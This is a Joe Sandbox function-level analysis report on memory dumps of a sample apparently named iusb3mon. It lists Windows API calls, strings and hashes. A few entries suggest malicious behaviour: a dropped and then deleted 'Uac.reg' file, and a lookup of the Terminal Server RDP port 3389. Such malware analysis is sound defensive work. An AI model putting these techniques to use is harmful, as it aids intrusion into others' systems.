Part of subcall function 04D73BBA: WriteFile.KERNEL32(00000000,04D95588,000000F5,?,00000000), ref: 04D73BE8
Part of subcall function 04D73BBA: CloseHandle.KERNEL32(00000000), ref: 04D73BF5

Sleep.KERNEL32(?), ref: 04D73C72
Sleep.KERNEL32(000003E8), ref: 04D73C79
DeleteFileA.KERNEL32(Uac.reg), ref: 04D73C80

Strings

Uac.reg, xrefs: 04D73C0A, 04D73C7B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Sleep$CloseCopyCreateDeleteHandleModuleNameWrite
String ID: Uac.reg
API String ID: 3965208581-763348774
Opcode ID: 4e0fcda7c35d61377c8b1b9e6f9c1f3653f92be656b5736b405f1405a5bc974d
Instruction ID: 21996e827097de03ad3e1041cda01a6f0dba1c2628f1de0c1d1fe8287ed14021
Opcode Fuzzy Hash: 4e0fcda7c35d61377c8b1b9e6f9c1f3653f92be656b5736b405f1405a5bc974d
Instruction Fuzzy Hash: A4016772A10219AFEB109FA4DC49FDE7BBCE744310F000196E244E6290DAB46E84CF51

Function 04D8B5EE Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 04D8B5FA
GetSysColor.USER32(00000010), ref: 04D8B601
GetSysColor.USER32(00000014), ref: 04D8B608
GetSysColor.USER32(00000012), ref: 04D8B60F
GetSysColor.USER32(00000006), ref: 04D8B616
GetSysColorBrush.USER32(0000000F), ref: 04D8B623
GetSysColorBrush.USER32(00000006), ref: 04D8B62A

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 9b0d669d04c7ff2d1217957574914e82adc35b782dd532ea18f0234119ce5342
Instruction ID: f657ca9b8501bab5461479ae7eb2910018b8ab3a59ce4b4d93a64db4859a7945
Opcode Fuzzy Hash: 9b0d669d04c7ff2d1217957574914e82adc35b782dd532ea18f0234119ce5342
Instruction Fuzzy Hash: 67F01C719407489BD730BF729D09B57BAE0FFC4B10F020D2EE2858BA90E6B5A400DF40

Function 00575674 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,005987D3,?,?,bad locale name), ref: 005756BD
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,005987D3,?,?,bad locale name), ref: 00575728
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,005987D3,?,?,bad locale name), ref: 00575745
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,005987D3,?,?,bad locale name), ref: 00575784
LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,005987D3,?,?,bad locale name), ref: 005757E3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,005987D3,?,?,bad locale name), ref: 00575806

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 0845ee25b0d61c17427479f54dfe9abe0e208e7a920fb0d534141671280bf480
Instruction ID: c6e3fc97593a18dc858e440f6e3c8872e480a7ba83232ca87a333b646cb2b503
Opcode Fuzzy Hash: 0845ee25b0d61c17427479f54dfe9abe0e208e7a920fb0d534141671280bf480
Instruction Fuzzy Hash: 4151A472910606EFEB205F61EC45FAA7FA9FF44750F64C429F909AA150E7B19C10EB60

Function 04D81CDF Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,04D8E7F0,00000001,?,7591E860,04DA893C,?,?,00000002,00000000,?,?,04D83769,?), ref: 04D81D1E
GetStringTypeA.KERNEL32(00000000,00000001,04DA6150,00000001,?,?,?,04D83769,?), ref: 04D81D38
GetStringTypeA.KERNEL32(?,?,?,00000000,00000002,7591E860,04DA893C,?,?,00000002,00000000,?,?,04D83769,?), ref: 04D81D6C
MultiByteToWideChar.KERNEL32(?,04DA893D,?,00000000,00000000,00000000,7591E860,04DA893C,?,?,00000002,00000000,?,?,04D83769,?), ref: 04D81DA4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 04D81DFA
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 04D81E0C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: f022cf440abeb94d7eafe16a97b42d29a2ca423559a3cf0513032f2ad88f9bdd
Instruction ID: dbac4e00f84316b83829b9532ddb213fa40ad101e56160f9e3fb57def43ab0a7
Opcode Fuzzy Hash: f022cf440abeb94d7eafe16a97b42d29a2ca423559a3cf0513032f2ad88f9bdd
Instruction Fuzzy Hash: BE417972A00219EFDF21AF94DC85EFF7BA9FB09255F044529FA11D6240D734A866CBA0

Function 04D8C729 Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,04DA6588,00000000,?,00000000,?,04D8C89F,04DA6588,00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773), ref: 04D8C734
EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,04D8C89F,04DA6588,00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?), ref: 04D8C783
LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,04D8C89F,04DA6588,00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?), ref: 04D8C796
LocalAlloc.KERNEL32(00000000,?,?,00000000,?,04D8C89F,04DA6588,00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?), ref: 04D8C7AC
LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,04D8C89F,04DA6588,00000000,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773), ref: 04D8C7BE
TlsSetValue.KERNEL32(00000000,00000000,00000100), ref: 04D8C7FA

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 07f3e18477cd11bea967afbc5a1c9b33f0fe45439208bb0c9c82644fc5470e73
Instruction ID: 8617c3cee2e1fd9d3f744f6fe4402079557f9a539b0de2af0f86081290fd9248
Opcode Fuzzy Hash: 07f3e18477cd11bea967afbc5a1c9b33f0fe45439208bb0c9c82644fc5470e73
Instruction Fuzzy Hash: 90314775210605EFEB24EF24D899E76B7F8FB46B64F00851DE45AC6680EB34F805CB60

Function 04D89ED2 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D89ED7
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 04D89F24
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 04D89F46
GetCapture.USER32 ref: 04D89F58
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 04D89F67
WinHelpA.USER32(?,?,?,?), ref: 04D89F7B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: a316d1a8354d83cd0e3a5c99fd3a9830e3aea83d00c80eab495b51990e93ab57
Instruction ID: 3e867a7bd2491ad8c18bab215e3d09016ed8f5e377722ce8c19da4e83b2f6c6a
Opcode Fuzzy Hash: a316d1a8354d83cd0e3a5c99fd3a9830e3aea83d00c80eab495b51990e93ab57
Instruction Fuzzy Hash: 50215EB1340209BFFB217F64DC88E7A7BBAEF44B58F15456DB245972E1CA71AC009B20

Function 04D8C0EA Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 04D8C11D
GetLastActivePopup.USER32(?), ref: 04D8C12C
IsWindowEnabled.USER32(?), ref: 04D8C141
EnableWindow.USER32(?,00000000), ref: 04D8C154
GetWindowLongA.USER32(?,000000F0), ref: 04D8C166
GetParent.USER32(?), ref: 04D8C174

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 4591e511cd6841020086b7c919b60fb1dc12a99c8dfec9907954d008e6988fbd
Instruction ID: 5172791533d4bcf15cc9189bed906c6920f6e696cc863c6b70e54719d0e775b0
Opcode Fuzzy Hash: 4591e511cd6841020086b7c919b60fb1dc12a99c8dfec9907954d008e6988fbd
Instruction Fuzzy Hash: 72115E72721321D79B317A6988C4B3AB6D8BF66FA5F05411DEE05D3204DB68EC0146B1

Function 04D7EDA1 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EDD9
VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EDE4
HeapFree.KERNEL32(00000000,?,?,?,?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EDF1
HeapFree.KERNEL32(00000000,?,?,?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EE0D
VirtualFree.KERNEL32(?,00000000,00008000,?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EE2E
HeapDestroy.KERNEL32(?,?,04D7B691,04D7B6E5,?,?,?), ref: 04D7EE40

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$HeapVirtual$Destroy
String ID:
API String ID: 716807051-0
Opcode ID: cc4d849731d97b77448f01869ad29362176d0bde1d0293990ea77cfe6f1b91a5
Instruction ID: b2f057e2e2e10fd88eceb007b9d0d5375466d3dfd4520b9798158bae425fec8e
Opcode Fuzzy Hash: cc4d849731d97b77448f01869ad29362176d0bde1d0293990ea77cfe6f1b91a5
Instruction Fuzzy Hash: 0411C036B41204AFDB31AF10EC65F16B3A5FB40710F214868FA81B3690D675BCA1EF14

Function 04D8B866 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 04D8B875
GetWindow.USER32(?,00000005), ref: 04D8B886
GetDlgCtrlID.USER32(00000000), ref: 04D8B88F
GetWindowLongA.USER32(00000000,000000F0), ref: 04D8B89E
GetWindowRect.USER32(00000000,?), ref: 04D8B8B0
PtInRect.USER32(?,?,?), ref: 04D8B8C0

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 203ceaf131506af7978b91382b72918e8cd5730ef514e49310a9a95ec2f6476c
Instruction ID: 940284879ef99cbd51f4e61664bfa6e357025eb41f04fbdc0d5aa4c418320eeb
Opcode Fuzzy Hash: 203ceaf131506af7978b91382b72918e8cd5730ef514e49310a9a95ec2f6476c
Instruction Fuzzy Hash: 17017832201119BBEB11AA68DC18EBE776CFF46311B04452AF915D2294E738E9128F90

Function 04D77550 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D7758B

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

lstrlenA.KERNEL32(00000080), ref: 04D775B9
lstrlenA.KERNEL32(00000080), ref: 04D775C5

Strings

SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s, xrefs: 04D77585
PortNumber, xrefs: 04D7759F
3389, xrefs: 04D775BF, 04D775C4

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
API String ID: 4274792114-3034822107
Opcode ID: 620c45dd218101fae90ff72e9831c33dcaa270ca1f1a34ed147aa0c0f028f841
Instruction ID: 479c0a514949b54fd7648c85409fe94f400e135b260b99fa8191a8d0b0dea894
Opcode Fuzzy Hash: 620c45dd218101fae90ff72e9831c33dcaa270ca1f1a34ed147aa0c0f028f841
Instruction Fuzzy Hash: 25F049B260122877DF209A518C09FAB7F7DEF85658F040055BB08B2140E534F956CFF5

Function 04D78332 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(75070000), ref: 04D7834A
FreeLibrary.KERNEL32(6F060000), ref: 04D78354
FreeLibrary.KERNEL32(?), ref: 04D7835E
FreeLibrary.KERNEL32(?), ref: 04D78368
FreeLibrary.KERNEL32(762F0000), ref: 04D78372
FreeLibrary.KERNEL32(76A80000), ref: 04D7837C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9c281512e6152540a506d485827e13eba1bf5f65ea14eb87badd39e88d6530a6
Instruction ID: c2ab1401e642f905c66def8d0eb80058bc4478299215648396db30f38595d7dd
Opcode Fuzzy Hash: 9c281512e6152540a506d485827e13eba1bf5f65ea14eb87badd39e88d6530a6
Instruction Fuzzy Hash: 85F0E7707007059AEA30BE7EDC48B27F3ECBF90650B09591DB455D3650EA74F8459A20

Function 04D8B632 Relevance: 9.0, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 04D8B63F
GetSystemMetrics.USER32(0000000C), ref: 04D8B646
GetDC.USER32(00000000), ref: 04D8B65F
GetDeviceCaps.GDI32(00000000,00000058), ref: 04D8B670
GetDeviceCaps.GDI32(00000000,0000005A), ref: 04D8B678
ReleaseDC.USER32(00000000,00000000), ref: 04D8B680

Part of subcall function 04D8CD61: GetSystemMetrics.USER32(00000002), ref: 04D8CD73
Part of subcall function 04D8CD61: GetSystemMetrics.USER32(00000003), ref: 04D8CD7D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 5f2d10134f026a25c296e28e91babb4d9356bab77247436aca41e14531c70ee5
Instruction ID: dbb743bf4d2d5d69771b617d3db48b0bb779c03a1cf973c0d9e381a126cde231
Opcode Fuzzy Hash: 5f2d10134f026a25c296e28e91babb4d9356bab77247436aca41e14531c70ee5
Instruction Fuzzy Hash: 58F03070640700AAF6207B619C99F3B7BA4EB81B52F01482EF645866C0DAB4AC059EB1

Function 04D7EBFC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 04D7EC1B
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 04D7EC50
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D7ECB0

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 04D7EC8A
__MSVCRT_HEAP_SELECT, xrefs: 04D7EC4B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: c34c2cba33cddbf6160e692d97aad5281e9f23d5cdfcdcc293910c2d3d913c12
Instruction ID: 4043f77f6ab1e7a1c0a3c30bbb2df0ac1b0285541ff8354dc5a419b90fcb2599
Opcode Fuzzy Hash: c34c2cba33cddbf6160e692d97aad5281e9f23d5cdfcdcc293910c2d3d913c12
Instruction Fuzzy Hash: 72313775A0128C6EFB3596709C55BEE3B6CEB06304F2844E9D585D6142F631FAC9CB21

Function 04D899BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 04D89A74
GetWindowLongA.USER32(?,000000FC), ref: 04D89A85
GetWindowLongA.USER32(?,000000FC), ref: 04D89A95
SetWindowLongA.USER32(?,000000FC,?), ref: 04D89AB1

Strings

(, xrefs: 04D89A5F

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: a7704245a55690125aab6e41b9c249bb201ac93ba5da282c478261289694d6a5
Instruction ID: c384a8222f447b348d7a23a8301684f867dc422a95f1bae00a750d9e6684dedf
Opcode Fuzzy Hash: a7704245a55690125aab6e41b9c249bb201ac93ba5da282c478261289694d6a5
Instruction Fuzzy Hash: 0C319EB1600204AFEB21BF68C8A4B79BBE4FF45714F1542ADE58697690DB70F8448FA1

Function 0057DB3E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,110D3D80,?,?,00000000,0058DA11,000000FF,?,0057DACE,?,?,0057DAA2,00000016), ref: 0057DB73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0057DB85
FreeLibrary.KERNEL32(00000000,?,00000000,0058DA11,000000FF,?,0057DACE,?,?,0057DAA2,00000016), ref: 0057DBA7

Strings

CorExitProcess, xrefs: 0057DB7D
mscoree.dll, xrefs: 0057DB6C

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
